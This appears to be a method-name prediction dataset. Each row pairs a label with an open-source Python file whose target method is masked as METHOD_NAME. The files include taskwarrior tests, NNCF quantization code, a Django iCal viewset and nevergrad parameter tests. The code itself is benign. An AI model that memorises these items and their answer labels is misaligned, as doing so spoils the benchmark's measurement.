id int64 0 300k | label stringlengths 1 74 ⌀ | text stringlengths 4k 8k |
|---|---|---|
298,400 | set up class | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright 2006 - 2021, Tomas Babej, Paul Beckingham, Federico Hernandez.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# https://www.opensource.org/licenses/mit-license.php
#
###############################################################################
import sys
import os
import unittest
# Ensure python finds the local simpletap module
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from basetest import Task, TestCase
class TestStart(TestCase):
    """Exercise the taskwarrior 'start'/'stop' commands and their journal output."""

    @classmethod
    def METHOD_NAME(cls):
        """Executed once before any test in the class"""

    def setUp(self):
        """Executed before each test in the class"""
        # Fresh task database per test.
        self.t = Task()

    def test_start_stop(self):
        """Add, start, stop a task"""
        self.t("add one")
        self.t("add two")
        # Nothing started yet, so 'active' must exit non-zero.
        code, out, err = self.t.runError("active")
        self.t("1,2 start")
        code, out, err = self.t("active")
        self.assertIn("one", out)
        self.assertIn("two", out)
        self.t("1 stop")
        code, out, err = self.t("active")
        self.assertNotIn("one", out)
        self.assertIn("two", out)
        self.t("2 stop")
        # Both stopped again: 'active' fails once more.
        code, out, err = self.t.runError("active")
        self.t("2 done")
        code, out, err = self.t("list")
        self.assertNotIn("two", out)

    def test_journal_time(self):
        """Verify journal.time tracks state"""
        self.t.config("journal.time", "1")
        self.t("add one")
        self.t("1 start")
        code, out, err = self.t("long")
        self.assertIn("Started task", out)
        self.t("1 stop")
        code, out, err = self.t("long")
        self.assertIn("Stopped task", out)

    def test_journal_annotations(self):
        """Verify journal start/stop annotations are used"""
        self.t.config("journal.time", "1")
        # Custom (non-ASCII) annotation strings must be used verbatim.
        self.t.config("journal.time.start.annotation", "Nu kör vi")
        self.t.config("journal.time.stop.annotation", "Nu stannar vi")
        self.t("add one")
        self.t("1 start")
        code, out, err = self.t("long")
        self.assertIn("Nu kör vi", out)
        self.t("1 stop")
        code, out, err = self.t("long")
        self.assertIn("Nu stannar vi", out)

    def test_start_remove_end(self):
        """Verify that starting a task removes end timestamp"""
        self.t("add one")
        uuid = self.t('_get 1.uuid')[1].strip()
        self.t("1 done")
        task = self.t.export()[0]
        self.assertIn("end", task)
        # Restarting a completed task must clear its 'end' attribute.
        self.t(uuid + " start")
        task = self.t.export()[0]
        self.assertNotIn("end", task)
class TestActiveTaskHandling(TestCase):
    """Verify how 'start' treats non-pending and already-active tasks."""

    def setUp(self):
        self.t = Task()
        self.t("add one +one")

    def test_start_completed(self):
        """Completed task set to pending by start"""
        self.t("+one done")
        self.t("+one start")
        tl = self.t.export()
        self.assertEqual(tl[0]["status"], "pending")

    def test_start_deleted(self):
        """Deleted task set to pending by start"""
        # Deletion prompts for confirmation; feed it 'y'.
        self.t("+one delete", input="y\n")
        self.t("+one start")
        tl = self.t.export()
        self.assertEqual(tl[0]["status"], "pending")

    def test_start_nothing(self):
        """Verify error message when no tasks are specified"""
        code, out, err = self.t.runError("999 start")
        self.assertIn("No tasks specified.", err)

    def test_start_started(self):
        """Verify error when starting a started task"""
        self.t("1 start")
        code, out, err = self.t.runError("1 start")
        # NOTE(review): this checks stdout while test_start_nothing checks
        # stderr — confirm which stream carries the "already started" message.
        self.assertIn("Task 1 'one' already started.", out)
class TestFeature608(TestCase):
    """Feature 608: completing an active task must also stop it."""

    def setUp(self):
        """Executed before each test in the class"""
        self.t = Task()

    def test_done_stop(self):
        """608: Done should stop an active task"""
        self.t("add foo")
        self.t("1 start")
        code, out, err = self.t("export")
        # Active task: has a start timestamp, no end yet.
        self.assertIn('"start":', out)
        self.assertNotIn('"end":', out)
        self.t("1 done")
        code, out, err = self.t("export")
        # Completion must drop 'start' and record 'end'.
        self.assertNotIn('"start":', out)
        self.assertIn('"end":', out)
if __name__ == "__main__":
    from simpletap import TAPTestRunner

    # Emit TAP-formatted results so the surrounding harness can aggregate them.
    unittest.main(testRunner=TAPTestRunner())
# vim: ai sts=4 et sw=4 ft=python |
298,401 | send to device | # Copyright (c) 2023 Intel Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Dict, Optional, Tuple
import torch
from nncf.common.quantization.structs import QuantizationPreset
from nncf.data import Dataset
from nncf.parameters import ModelType
from nncf.parameters import TargetDevice
from nncf.quantization.advanced_parameters import AdvancedQuantizationParameters
from nncf.quantization.algorithms.post_training.algorithm import PostTrainingQuantization
from nncf.scopes import IgnoredScope
from nncf.torch.dynamic_graph.context import no_nncf_trace
from nncf.torch.dynamic_graph.io_handling import replicate_same_tensors
from nncf.torch.dynamic_graph.io_handling import wrap_nncf_model_inputs_with_objwalk
from nncf.torch.dynamic_graph.io_handling import wrap_nncf_model_outputs_with_objwalk
from nncf.torch.nested_objects_traversal import objwalk
from nncf.torch.nncf_network import NNCFNetwork
from nncf.torch.utils import get_model_device
from nncf.torch.utils import is_tensor
from nncf.torch.utils import training_mode_switcher
def create_nncf_network(model: torch.nn.Module, dataset: Dataset) -> NNCFNetwork:
    """
    Creates NNCFNetwork instance for the PyTorch model where the first item of dataset
    is used for model tracing.

    :param model: PyTorch model
    :param dataset: Dataset for model tracing
    :return: NNCFNetwork instance for the input model
    """

    def split_args_kwargs(sample: Any) -> Tuple[Tuple, Dict]:
        # A non-tuple sample is treated as a single positional argument.
        if isinstance(sample, tuple):
            return sample, {}
        return (sample,), {}

    def wrap_inputs(args, kwargs):
        return wrap_nncf_model_inputs_with_objwalk(args, kwargs)

    def wrap_outputs(retval):
        return wrap_nncf_model_outputs_with_objwalk(retval)

    def make_dummy_forward(data_source, target_device):
        # Builds the forward used once for tracing: it pulls the first
        # calibration sample and pushes it through the model.
        def dummy_forward(model_):
            with no_nncf_trace():
                sample = next(iter(data_source.get_inference_data()))
                args, kwargs = split_args_kwargs(sample)

                def send_to_device(tensor):
                    return tensor.to(target_device)

                args = objwalk(args, is_tensor, send_to_device)
                kwargs = objwalk(kwargs, is_tensor, send_to_device)
            args, kwargs = wrap_inputs(args, kwargs)
            retval = model_(*args, **kwargs)
            retval = replicate_same_tensors(retval)
            return wrap_outputs(retval)

        return dummy_forward

    device = get_model_device(model)
    dummy_forward_fn = make_dummy_forward(dataset, device)
    # Trace in eval mode so dropout/batch-norm behave deterministically.
    with training_mode_switcher(model, is_training=False):
        nncf_network = NNCFNetwork(
            model, dummy_forward_fn=dummy_forward_fn, wrap_inputs_fn=wrap_inputs, wrap_outputs_fn=wrap_outputs
        )
        nncf_network.nncf.get_tracing_context().disable_trace_dynamic_graph()
    return nncf_network
def quantize_impl(
    model: torch.nn.Module,
    calibration_dataset: Dataset,
    preset: QuantizationPreset,
    target_device: TargetDevice,
    subset_size: int,
    fast_bias_correction: bool,
    model_type: Optional[ModelType] = None,
    ignored_scope: Optional[IgnoredScope] = None,
    advanced_parameters: Optional[AdvancedQuantizationParameters] = None,
) -> torch.nn.Module:
    """
    Experimental implementation of the `quantize()` method for the PyTorch backend.

    :param model: model to quantize (switched to eval mode for tracing)
    :param calibration_dataset: dataset used for tracing and statistics collection
    :return: the quantized model with dynamic graph building disabled
    :raises ValueError: if fast bias correction is disabled
    :raises RuntimeError: if the CPU_SPR target device is requested
    """
    # Reject configurations this backend does not support, before any tracing.
    if fast_bias_correction is False:
        raise ValueError(f"fast_bias_correction={fast_bias_correction} is not supported")
    if target_device == TargetDevice.CPU_SPR:
        raise RuntimeError("target_device == CPU_SPR is not supported")

    network = create_nncf_network(model.eval(), calibration_dataset)

    algorithm = PostTrainingQuantization(
        preset=preset,
        target_device=target_device,
        subset_size=subset_size,
        fast_bias_correction=fast_bias_correction,
        model_type=model_type,
        ignored_scope=ignored_scope,
        advanced_parameters=advanced_parameters,
    )
    quantized_model = algorithm.apply(
        network, network.nncf.get_graph(), dataset=calibration_dataset
    )
    # Freeze the traced graph so inference does not try to rebuild it.
    quantized_model.nncf.disable_dynamic_graph_building()
    return quantized_model
298,402 | regenerate | from datetime import timedelta
from django.db.models import Q
from django.utils import timezone
from rest_framework import decorators, permissions, viewsets
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.settings import api_settings
from lego.apps.events.models import Event
from lego.apps.ical import constants, utils
from lego.apps.ical.authentication import ICalTokenAuthentication
from lego.apps.ical.models import ICalToken
from lego.apps.ical.serializers import ICalTokenSerializer
from lego.apps.meetings import constants as meeting_constants
from lego.apps.meetings.models import Meeting, MeetingInvitation
from lego.apps.permissions.utils import get_permission_handler
class ICalTokenViewset(viewsets.ViewSet):
    """
    API Endpoint to get a token for ical-urls.

    To regenerate go to [regenerate](regenerate/).
    """

    permission_classes = (IsAuthenticated,)

    @decorators.action(detail=False, methods=["PATCH"])
    def METHOD_NAME(self, request, *args, **kwargs):
        """Regenerate ICalToken."""
        token, created = ICalToken.objects.get_or_create(user=request.user)
        # A token created just now is already fresh; only rotate existing ones.
        if not created:
            token.METHOD_NAME()
        return Response(ICalTokenSerializer(token).data)

    def list(self, request):
        """Get ICalToken."""
        token, _created = ICalToken.objects.get_or_create(user=request.user)
        return Response(ICalTokenSerializer(token).data)
class ICalViewset(viewsets.ViewSet):
    """
    API Endpoint to get ICalendar files for different kinds of events and meetings.

    usage: [events/?token=yourtoken](events/?token=yourtoken)
    """

    permission_classes = (permissions.IsAuthenticated,)
    # Calendar clients cannot do interactive login, so token authentication
    # (?token=...) is accepted in addition to the default classes.
    authentication_classes = api_settings.DEFAULT_AUTHENTICATION_CLASSES + [  # type: ignore
        ICalTokenAuthentication
    ]

    def list(self, request):
        """List all the different icals."""
        token = ICalToken.objects.get_or_create(user=request.user)[0]
        path = request.get_full_path()
        data = {
            "result": {
                "calendars": [
                    {
                        "name": "events",
                        "description": "Calendar with all events on Abakus.no.",
                        "path": f"{path}events/",
                    },
                    {
                        "name": "personal",
                        "description": "Calendar with your favorite events & meetings.",
                        "path": f"{path}personal/",
                    },
                    {
                        "name": "registration",
                        "description": "Calendar with all event registration times.",
                        "path": f"{path}registrations/",
                    },
                ],
                "token": ICalTokenSerializer(token).data,
            }
        }
        return Response(data=data)

    @decorators.action(detail=False, methods=["GET"])
    def personal(self, request):
        """Personal ical route."""
        calendar_type = constants.TYPE_PERSONAL
        feed = utils.generate_ical_feed(request, calendar_type)
        event_permission_handler = get_permission_handler(Event)
        # Only events the user follows, filtered by view permission.
        following_events = event_permission_handler.filter_queryset(
            request.user, Event.objects.filter(followers__follower_id=request.user.id)
        )
        meeting_permission_handler = get_permission_handler(Meeting)
        attending_invites = MeetingInvitation.objects.filter(
            status=meeting_constants.ATTENDING, user=request.user
        )
        meetings = meeting_permission_handler.filter_queryset(
            request.user,
            Meeting.objects.annotate(
                # Annotate the queryset with participating status for use in the feed generation.
                # Otherwise lookups are very expensive
                user_participating=Q(invitations__in=attending_invites)
            ),
        )
        utils.add_events_to_ical_feed(feed, following_events)
        utils.add_meetings_to_ical_feed(feed, meetings, request.user)
        return utils.render_ical_response(feed, calendar_type)

    @decorators.action(detail=False, methods=["GET"])
    def registrations(self, request):
        """Registration ical route."""
        calendar_type = constants.TYPE_REGISTRATIONS
        feed = utils.generate_ical_feed(request, calendar_type)
        permission_handler = get_permission_handler(Event)
        # Only future events can still be registered for.
        events = permission_handler.filter_queryset(
            request.user, Event.objects.all().filter(end_time__gt=timezone.now())
        )
        for event in events:
            reg_time = event.get_earliest_registration_time(request.user)
            if not reg_time:  # User cannot register
                continue
            # Each registration slot is rendered as a short fixed-length event.
            ical_starttime = reg_time
            ical_endtime = ical_starttime + timedelta(
                minutes=constants.REGISTRATION_EVENT_LENGTH_IN_MINUTES
            )
            price = event.get_price(request.user) if event.is_priced else None
            title = f"Reg: {event.title}"
            utils.add_event_to_ical_feed(
                feed,
                event,
                price=price,
                title=title,
                ical_starttime=ical_starttime,
                ical_endtime=ical_endtime,
            )
        return utils.render_ical_response(feed, calendar_type)

    @decorators.action(detail=False, methods=["GET"])
    def events(self, request):
        """Event ical route."""
        calendar_type = constants.TYPE_EVENTS
        feed = utils.generate_ical_feed(request, calendar_type)
        permission_handler = get_permission_handler(Event)
        # Include recently-ended events so clients keep a little history.
        events = permission_handler.filter_queryset(
            request.user,
            Event.objects.all().filter(
                end_time__gt=timezone.now()
                - timedelta(days=constants.HISTORY_BACKWARDS_IN_DAYS)
            ),
        )
        utils.add_events_to_ical_feed(feed, events)
        return utils.render_ical_response(feed, calendar_type)
298,403 | test product filter | import json
from datetime import date, timedelta
from kitsune.dashboards.models import METRIC_CODE_CHOICES
from kitsune.dashboards.tests import WikiMetricFactory
from kitsune.products.tests import ProductFactory
from kitsune.sumo.templatetags.jinja_helpers import urlparams
from kitsune.sumo.tests import TestCase
from kitsune.sumo.urlresolvers import reverse
class WikiMetricAPITests(TestCase):
    """Tests for the wikimetric list API endpoint and its filters."""

    def test_default(self):
        """Test the default API call (no filtering)."""
        today = date.today()
        # Create 10 wikimetrics.
        for i in range(10):
            WikiMetricFactory(
                code=METRIC_CODE_CHOICES[i % len(METRIC_CODE_CHOICES)][0],
                date=today - timedelta(days=i),
                value=i,
            )
        # Call the API.
        response = self.client.get(urlparams(reverse("api.wikimetric_list"), format="json"))
        self.assertEqual(200, response.status_code)
        results = json.loads(response.content)["results"]
        # Verify the results are what we created.
        self.assertEqual(10, len(results))
        for i in range(10):
            result = results[i]
            self.assertEqual(i, result["value"])
            self.assertEqual(METRIC_CODE_CHOICES[i % len(METRIC_CODE_CHOICES)][0], result["code"])
            self.assertEqual(str(today - timedelta(days=i)), result["date"])

    def METHOD_NAME(self):
        """Test filtering results by product."""
        today = date.today()
        # Create products and associated wiki metrics.
        p1 = ProductFactory()
        p2 = ProductFactory()
        # Create 3 for each product:
        for i in range(3):
            for p in [p1, p2]:
                WikiMetricFactory(date=today - timedelta(days=i), product=p)
        # Create one more for p2.
        WikiMetricFactory(date=today - timedelta(days=4), product=p2)
        # Call and verify the API for product=p1.
        response = self.client.get(
            urlparams(reverse("api.wikimetric_list"), format="json", product=p1.slug)
        )
        self.assertEqual(200, response.status_code)
        results = json.loads(response.content)["results"]
        self.assertEqual(3, len(results))
        # Call and verify the API for product=p2.
        response = self.client.get(
            urlparams(reverse("api.wikimetric_list"), format="json", product=p2.slug)
        )
        self.assertEqual(200, response.status_code)
        results = json.loads(response.content)["results"]
        self.assertEqual(4, len(results))

    def test_locale_filter(self):
        """Test filtering results by locale."""
        today = date.today()
        # Create 3 wikimetrics for es:
        for i in range(3):
            WikiMetricFactory(locale="es", date=today - timedelta(days=i))
        # Create 1 for fr:
        WikiMetricFactory(locale="fr")
        # Call and verify the API for locale=es.
        response = self.client.get(
            urlparams(reverse("api.wikimetric_list"), format="json", locale="es")
        )
        self.assertEqual(200, response.status_code)
        results = json.loads(response.content)["results"]
        self.assertEqual(3, len(results))
        # Call and verify the API for locale=fr.
        response = self.client.get(
            urlparams(reverse("api.wikimetric_list"), format="json", locale="fr")
        )
        self.assertEqual(200, response.status_code)
        results = json.loads(response.content)["results"]
        self.assertEqual(1, len(results))

    def test_code_filter(self):
        """Test filtering results by code."""
        today = date.today()
        # Create 3 wikimetrics for active_contributors:
        for i in range(3):
            WikiMetricFactory(code=METRIC_CODE_CHOICES[0][0], date=today - timedelta(days=i))
        # Create 1 for percent_localized_all:
        WikiMetricFactory(code=METRIC_CODE_CHOICES[1][0])
        # Call and verify the API for code=METRIC_CODE_CHOICES[0].
        response = self.client.get(
            urlparams(
                reverse("api.wikimetric_list"), format="json", code=METRIC_CODE_CHOICES[0][0]
            )
        )
        self.assertEqual(200, response.status_code)
        results = json.loads(response.content)["results"]
        self.assertEqual(3, len(results))
        # Call and verify the API for code=METRIC_CODE_CHOICES[1].
        response = self.client.get(
            urlparams(
                reverse("api.wikimetric_list"), format="json", code=METRIC_CODE_CHOICES[1][0]
            )
        )
        self.assertEqual(200, response.status_code)
        results = json.loads(response.content)["results"]
        self.assertEqual(1, len(results))
298,404 | test ordered discrete | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""This test module contains old tests coming from the instrumentation package.
Some are still relevant, others are not, we should sort this out eventually.
Overall, they may be overly complicated because they were converted from the old framework...
"""
import typing as tp
import numpy as np
import pytest
from . import parameter as p
def test_instrumentation_set_standardized_data() -> None:
    """Standardized data maps back onto the instrumentation's (args, kwargs)."""
    instru = p.Instrumentation(p.Choice(list(range(5))), p.Scalar(init=3).set_mutation(sigma=4))
    child = instru.spawn_child().set_standardized_data([0, 200, 0, 0, 0, 2])
    # Index 1 carries the dominant weight; the scalar becomes 3 + 4 * 2 = 11.
    assert child.args == (1, 11)
    # A vector of the wrong dimension must be rejected.
    np.testing.assert_raises(
        ValueError, instru.spawn_child().set_standardized_data, [0, 0, 200, 0, 0, 0, 2, 3]
    )
def test_instrumentation() -> None:
    """End-to-end checks on Instrumentation: dimension, data round-trip,
    deterministic vs stochastic sampling, copying, and naming.

    NOTE: the stochastic section depends on the global sampling order, so
    statements must not be reordered.
    """
    instru = p.Instrumentation(p.Scalar(), 3, b=p.Choice([0, 1, 2, 3]), a=p.TransitionChoice([0, 1, 2, 3]))
    np.testing.assert_equal(instru.dimension, 6)
    instru2 = p.Instrumentation(p.Scalar(), 3, b=p.Choice([0, 1, 2, 3]), a=p.TransitionChoice([0, 1, 2, 3]))
    np.testing.assert_equal(instru2.dimension, 6)
    # Round-trip a concrete value through standardized data.
    data = instru2.spawn_child(new_value=((4, 3), dict(a=0, b=3))).get_standardized_data(reference=instru2)
    np.testing.assert_array_almost_equal(data, [4, -1.1503, 0, 0, 0, 0.5878], decimal=4)
    child = instru.spawn_child()
    with p.helpers.deterministic_sampling(child):
        args, kwargs = child.set_standardized_data(data).value
    assert (args, kwargs) == ((4.0, 3), {"a": 0, "b": 3})
    assert "3),Dict(a=TransitionChoice(choices=Tuple(0,1,2,3)," in repr(
        instru
    ), f"Erroneous representation {instru}"
    # check deterministic
    data = np.array([0.0, 0, 0, 0, 0, 0])
    total = 0
    for _ in range(24):
        child = instru.spawn_child()
        with p.helpers.deterministic_sampling(child):
            total += child.set_standardized_data(data).kwargs["b"]
    np.testing.assert_equal(total, 0)
    # check stochastic
    for _ in range(24):
        total += instru.spawn_child().set_standardized_data(data).kwargs["b"]
    assert total != 0
    # check duplicate
    # instru2 = mvar.Instrumentation(*instru.args, **instru.kwargs)  # TODO: OUCH SILENT FAIL
    instru2.copy()
    data = np.random.normal(0, 1, size=6)
    values: tp.List[tp.Any] = []
    # Equivalent instrumentations must decode the same data identically.
    for val_instru in [instru, instru2]:
        child = val_instru.spawn_child()
        with p.helpers.deterministic_sampling(child):
            values.append(child.set_standardized_data(data).value)
    assert values[0] == values[1]
    # check naming
    instru_str = (
        "Instrumentation(Tuple(Scalar[sigma=Scalar{exp=2.03}],3),"
        "Dict(a=TransitionChoice(choices=Tuple(0,1,2,3),"
        "indices=Array{Cd(0,4),Add,Int},transitions=[1. 1.]),"
        "b=Choice(choices=Tuple(0,1,2,3),indices=Array{(1,4),SoftmaxSampling})))"
    )
    assert instru.name == instru_str
    assert instru.set_name("blublu").name == "blublu"
def _false(value: tp.Any) -> bool: # pylint: disable=unused-argument
return False
def test_instrumentation_copy() -> None:
    """A copy keeps the name and constraints but gets its own random state."""
    instru = p.Instrumentation(p.Scalar(), 3, b=p.Choice(list(range(1000)))).set_name("bidule")
    instru.register_cheap_constraint(_false)
    copied = instru.copy()
    assert copied.name == "bidule"
    assert copied.random_state is not instru.random_state
    # Seeding both identically must make their children agree
    # (variables must not share hidden random state).
    instru.random_state = np.random.RandomState(12)
    copied.random_state = np.random.RandomState(12)
    spawned_kwargs = [
        param.spawn_child().set_standardized_data([0] * 1001).kwargs
        for param in (instru, copied)
    ]
    assert spawned_kwargs[0] == spawned_kwargs[1]
    assert not copied.satisfies_constraints()
def test_instrumentation_init_error() -> None:
    """Reusing the same parameter instance twice must raise."""
    variable = p.Scalar()
    with np.testing.assert_raises(ValueError):
        p.Instrumentation(variable, variable)
def test_softmax_categorical_deterministic() -> None:
    """With deterministic=True the option with the largest weight always wins."""
    choice = p.Choice(["blu", "blublu", "blublublu"], deterministic=True)
    assert choice.set_standardized_data([1, 1, 1.01]).value == "blublublu"
def test_softmax_categorical() -> None:
    """Stochastic softmax choice, plus a round-trip through standardized data."""
    np.random.seed(12)  # the sampling below depends on the global numpy seed
    choice = p.Choice(["blu", "blublu", "blublublu"])
    assert choice.spawn_child().set_standardized_data([0.5, 1.0, 1.5]).value == "blublu"
    # Encoding a value and decoding it deterministically must recover it.
    encoded = choice.spawn_child(new_value="blu")
    sampled = choice.spawn_child()
    with p.helpers.deterministic_sampling(sampled):
        recovered = sampled.set_standardized_data(
            encoded.get_standardized_data(reference=choice)
        ).value
    assert recovered == "blu"
def METHOD_NAME() -> None:
    """TransitionChoice maps the real line onto the ordered options."""
    tchoice = p.TransitionChoice(["blu", "blublu", "blublublu"])
    # Large positive data saturates at the last option; 0 lands on the middle one.
    assert tchoice.spawn_child().set_standardized_data([5]).value == "blublublu"
    assert tchoice.spawn_child().set_standardized_data([0]).value == "blublu"
    # Encoding a value and decoding it deterministically must recover it.
    encoded = tchoice.spawn_child(new_value="blu")
    sampled = tchoice.spawn_child()
    with p.helpers.deterministic_sampling(sampled):
        recovered = sampled.set_standardized_data(
            encoded.get_standardized_data(reference=tchoice)
        ).value
    assert recovered == "blu"
def test_scalar() -> None:
    """Integer casting rounds the continuous value to the nearest int."""
    scalar = p.Scalar().set_integer_casting()
    assert scalar.spawn_child().set_standardized_data([0.7]).value == 1
    encoded = scalar.spawn_child(new_value=1)
    assert encoded.get_standardized_data(reference=scalar).tolist() == [1.0]
# bouncing with large values clips to the other side
@pytest.mark.parametrize("value,expected", [(0, 0.01), (10, 0.001), (-30, 0.1), (20, 0.001)])  # type: ignore
def test_log(value: float, expected: float) -> None:
    """Log parameters map standardized data into [lower, upper] geometrically."""
    log_param = p.Log(lower=0.001, upper=0.1)
    child = log_param.spawn_child().set_standardized_data(np.array([value]))
    np.testing.assert_approx_equal(child.value, expected, significant=4)
    repr(log_param)  # smoke-check that __repr__ does not raise
def test_log_int() -> None:
    """Integer casting composes with the log transform (0 maps near the geometric midpoint)."""
    log_param = p.Log(lower=300, upper=10000).set_integer_casting()
    child = log_param.spawn_child().set_standardized_data(np.array([0]))
    assert child.value == 1732
# note: 0.9/0.9482=0.9482/0.999
# with very large values, bouncing clips to the other side
@pytest.mark.parametrize("value,expected", [(0, 0.9482), (-11, 0.999), (10, 0.9)])  # type: ignore
def test_log_9(value: float, expected: float) -> None:
    """Zero maps to the geometric midpoint of a narrow log range; extremes bounce."""
    log_param = p.Log(lower=0.9, upper=0.999)
    child = log_param.spawn_child().set_standardized_data(np.array([value]))
    np.testing.assert_approx_equal(child.value, expected, significant=4)
298,405 | update state | # encoding: utf-8
#
# Project: MXCuBE
# https://github.com/mxcube.
#
# This file is part of MXCuBE software.
#
# MXCuBE is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# MXCuBE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU General Lesser Public License
# along with MXCuBE. If not, see <http://www.gnu.org/licenses/>.
"""
Microdiff with Exporter implementation of AbstartNState
Example xml file:
<device class="ExporterNState">
<username>Fluorescence Detector</username>
<exporter_address>wid30bmd2s:9001</exporter_address>
<value_channel_name>FluoDetectorIsBack</value_channel_name>
<state_channel_name>State</state_channel_name>
<values>{"IN": False, "OUT": True}</values>
</device>
"""
from enum import Enum
from gevent import sleep
from mxcubecore.HardwareObjects.abstract.AbstractNState import AbstractNState
from mxcubecore.Command.Exporter import Exporter
from mxcubecore.Command.exporter.ExporterStates import ExporterStates
__copyright__ = """ Copyright © 2020 by the MXCuBE collaboration """
__license__ = "LGPLv3+"
class ExporterNStateMockup(AbstractNState):
    """Mockup of the Microdiff Exporter implementation of AbstractNState.

    Mimics the Exporter-backed device without talking to real hardware:
    state transitions are simulated with short sleeps.
    """

    SPECIFIC_STATES = ExporterStates

    def __init__(self, name):
        AbstractNState.__init__(self, name)
        # self._mock_value = "OUT"
        # self._mock_state= "READY"

    def init(self):
        """Initialise the device"""
        AbstractNState.init(self)
        # Start on the second declared value (index 1) in READY state.
        value = [e.value for e in self.VALUES][1]
        self.update_state(self.STATES.READY)
        self.update_value(value)

    def _wait_ready(self, timeout=None):
        """Wait timeout seconds till status is ready.

        Args:
            timeout(float): Timeout [s]. None means infinite timeout.
        """
        # Mockup: simulate the wait with a fixed short delay.
        sleep(0.5)

    def METHOD_NAME(self, state=None):
        """To be used to update the state when emiting the "update" signal.

        Args:
            state (str): optional state value
        Returns:
            (enum 'HardwareObjectState'): state.
        """
        if not state:
            state = self.get_state()
        else:
            state = self._value2state(state)
        return self.update_state(state)

    def _value2state(self, state):
        """Convert string state to HardwareObjectState enum value

        Args:
            state (str): the state
        Returns:
            (enum 'HardwareObjectState'): state
        """
        try:
            return self.SPECIFIC_STATES.__members__[state.upper()].value
        except (AttributeError, KeyError):
            # Non-string input or unrecognized state name.
            return self.STATES.UNKNOWN

    # def get_state(self):
    #     """Get the device state.
    #     Returns:
    #         (enum 'HardwareObjectState'): Device state.
    #     """
    #     return self._value2state(self._mock_state)

    def abort(self):
        """Stop the action."""
        pass

    def _set_value(self, value):
        """Set device to value

        Args:
            value (str, int, float or enum): Value to be set.
        """
        # Simulate a hardware move: BUSY, short delay, then READY.
        self.update_state(self.STATES.BUSY)
        sleep(0.5)
        if isinstance(value, Enum):
            # Enum values may be declared as (value, ...) tuples; keep the first item.
            if isinstance(value.value, (tuple, list)):
                value = value.value[0]
            else:
                value = value.value
        self._nominal_value = value
        self.update_state(self.STATES.READY)

    def get_value(self):
        """Get the device value

        Returns:
            (Enum): Enum member, corresponding to the value or UNKNOWN.
        """
        # _val = self._mock_value
        return self.value_to_enum(self._nominal_value)
298,406 | add proj clip | # SPDX-License-Identifier: Apache-2.0
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class LSTMOptions(object):
    """Flatbuffers table accessor for TFLite LSTM operator options (generated code)."""
    __slots__ = ['_tab']

    @classmethod
    def GetRootAs(cls, buf, offset=0):
        # Read the root table offset and position an accessor on it.
        n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
        x = LSTMOptions()
        x.Init(buf, n + offset)
        return x

    @classmethod
    def GetRootAsLSTMOptions(cls, buf, offset=0):
        """This method is deprecated. Please switch to GetRootAs."""
        return cls.GetRootAs(buf, offset)

    @classmethod
    def LSTMOptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
        # b"\x54\x46\x4C\x33" is the "TFL3" file identifier.
        return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)

    # LSTMOptions
    def Init(self, buf, pos):
        self._tab = flatbuffers.table.Table(buf, pos)

    # LSTMOptions
    def FusedActivationFunction(self):
        # vtable slot 4 (int8); defaults to 0 when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Int8Flags, o + self._tab.Pos)
        return 0

    # LSTMOptions
    def CellClip(self):
        # vtable slot 6 (float32); defaults to 0.0 when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
        return 0.0

    # LSTMOptions
    def ProjClip(self):
        # vtable slot 8 (float32); defaults to 0.0 when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
        return 0.0

    # LSTMOptions
    def KernelType(self):
        # vtable slot 10 (int8); defaults to 0 when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
        if o != 0:
            return self._tab.Get(flatbuffers.number_types.Int8Flags, o + self._tab.Pos)
        return 0

    # LSTMOptions
    def AsymmetricQuantizeInputs(self):
        # vtable slot 12 (bool); defaults to False when absent.
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
